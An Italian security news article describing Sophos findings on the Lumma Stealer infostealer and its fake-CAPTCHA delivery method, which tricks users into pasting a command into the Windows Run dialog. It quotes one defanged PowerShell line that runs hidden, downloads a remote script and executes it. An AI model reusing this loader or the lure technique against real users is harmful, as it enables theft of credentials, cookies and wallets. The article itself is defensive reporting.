Lumma Stealer è tornato! Il malware che ruba tutto si evolve e diventa invisibile

Redazione RHC : 13 Maggio 2025 07:46

Lumma Stealer è un noto malware specializzato nel furto di informazioni, attivo sin dalla metà del 2022. Negli ultimi mesi ha mostrato un’evoluzione significativa nelle sue modalità operative, adottando nuove tattiche, tecniche e procedure. Questa minaccia è sempre più presente nei report relativi agli incidenti di sicurezza informatica: solo nell’ultimo anno, sono state registrate migliaia di compromissioni attribuite al malware.

Si ritiene che abbia origini nell’ambiente cybercriminale russo e venga attualmente distribuito come Malware-as-a-Service (MaaS). I suoi creatori offrono aggiornamenti frequenti e assistenza agli utenti tramite canali Telegram e una documentazione ospitata su Gitbook. L’obiettivo principale di Lumma Stealer è l’esfiltrazione di dati sensibili, come credenziali di accesso, token di sessione, wallet di criptovalute e informazioni personali raccolte dai dispositivi infetti.

Ciò che rende Lumma particolarmente pericoloso sono le sue sofisticate tecniche di distribuzione, che di recente si sono espanse fino a includere l’ingegneria sociale attraverso false domande CAPTCHA e ingannevoli richieste di download. Questi metodi sfruttano la fiducia degli utenti nei processi di verifica di sicurezza più noti , inducendo le vittime a eseguire comandi dannosi sui propri sistemi.

Scarica Gratuitamente Byte The Silence, il fumetto sul Cyberbullismo di Red Hot Cyber

«Il cyberbullismo è una delle minacce più insidiose e silenziose che colpiscono i nostri ragazzi. Non si tratta di semplici "bravate online", ma di veri e propri atti di violenza digitale, capaci di lasciare ferite profonde e spesso irreversibili nell’animo delle vittime. Non possiamo più permetterci di chiudere gli occhi». Così si apre la prefazione del fumetto di Massimiliano Brolli, fondatore di Red Hot Cyber, un’opera che affronta con sensibilità e realismo uno dei temi più urgenti della nostra epoca. Distribuito gratuitamente, questo fumetto nasce con l'obiettivo di sensibilizzare e informare. È uno strumento pensato per scuole, insegnanti, genitori e vittime, ma anche per chi, per qualsiasi ragione, si è ritrovato nel ruolo del bullo, affinché possa comprendere, riflettere e cambiare. Con la speranza che venga letto, condiviso e discusso, Red Hot Cyber è orgogliosa di offrire un contributo concreto per costruire una cultura digitale più consapevole, empatica e sicura.

Contattaci tramite WhatsApp al numero 375 593 1011 per richiedere ulteriori informazioni oppure alla casella di posta [email protected]

Supporta RHC attraverso:

• L'acquisto del fumetto sul Cybersecurity Awareness
• Ascoltando i nostri Podcast
• Seguendo RHC su WhatsApp
• Seguendo RHC su Telegram
• Scarica gratuitamente "Dark Mirror", il report sul ransomware di Dark Lab

Ti piacciono gli articoli di Red Hot Cyber? Non aspettare oltre, iscriviti alla newsletter settimanale per non perdere nessun articolo.

I ricercatori di Sophos hanno identificato diverse campagne Lumma Stealer durante l’autunno e l’inverno 2024-25, documentando come le tattiche del malware si sono evolute per eludere il rilevamento. “Le variazioni che abbiamo riscontrato nel comportamento di Lumma Stealer sono significative per i difensori”, ha osservato il team Sophos Managed Detection and Response nel suo report, sottolineando che queste tecniche di distribuzione potrebbero essere facilmente adattate ad altri malware oltre a Lumma Stealer.

Un’innovazione particolarmente preoccupante riguarda l’abuso di Windows PowerShell attraverso pagine di verifica CAPTCHA ingannevoli.

In questa catena di attacchi, alle vittime che visitano siti dannosi viene presentata una richiesta di verifica standard “Non sono un robot”, creando un falso senso di sicurezza e legittimità. Dopo aver cliccato sulla casella di verifica, gli utenti vengono reindirizzati a una seconda pagina che chiede loro di caricare il comando “Esegui” di Windows, quindi premere Ctrl+V seguito da Invio.

Questa azione apparentemente innocua in realtà incolla ed esegue un comando PowerShell nascosto che opera in una finestra nascosta:

C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -
command $uR= hxxps[://]fixedzip[.]oss-ap-southeast5[.]aliyuncs[.]com/n
ew-artist[.]txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t
=$reS.Content; iex $t

L’esecuzione di questo comando avvia un sofisticato processo di attacco multifase. Lo script recupera componenti malware aggiuntivi dai server di comando e controllo, scaricando, estraendo ed eseguendo il payload principale di Lumma Stealer. Una volta attivo, questo malware accede sistematicamente ai dati del browser, come evidenziato nella Figura 6, dove Autolt3.exe accede ai dati di accesso e ai cookie di Chrome.

Ciò che rende questo vettore di attacco particolarmente efficace è l’impiego della crittografia AES per nascondere i payload successivi. Il malware impiega sofisticate tecniche di offuscamento, tra cui l’impiego di vettori di inizializzazione e complesse routine di decrittazione, per eludere le tradizionali misure di sicurezza. Questa combinazione di ingegneria sociale e metodi tecnici avanzati rappresenta un’evoluzione significativa nelle capacità di Lumma Stealer.

Gli esperti di sicurezza raccomandano di implementare soluzioni di protezione degli endpoint robuste con funzionalità di analisi comportamentale, poiché il solo rilevamento basato sulle firme si rivela inadeguato contro queste minacce in continua evoluzione.

Redazione
La redazione di Red Hot Cyber è composta da un insieme di persone fisiche e fonti anonime che collaborano attivamente fornendo informazioni in anteprima e news sulla sicurezza informatica e sull'informatica in generale.

Lista degli articoli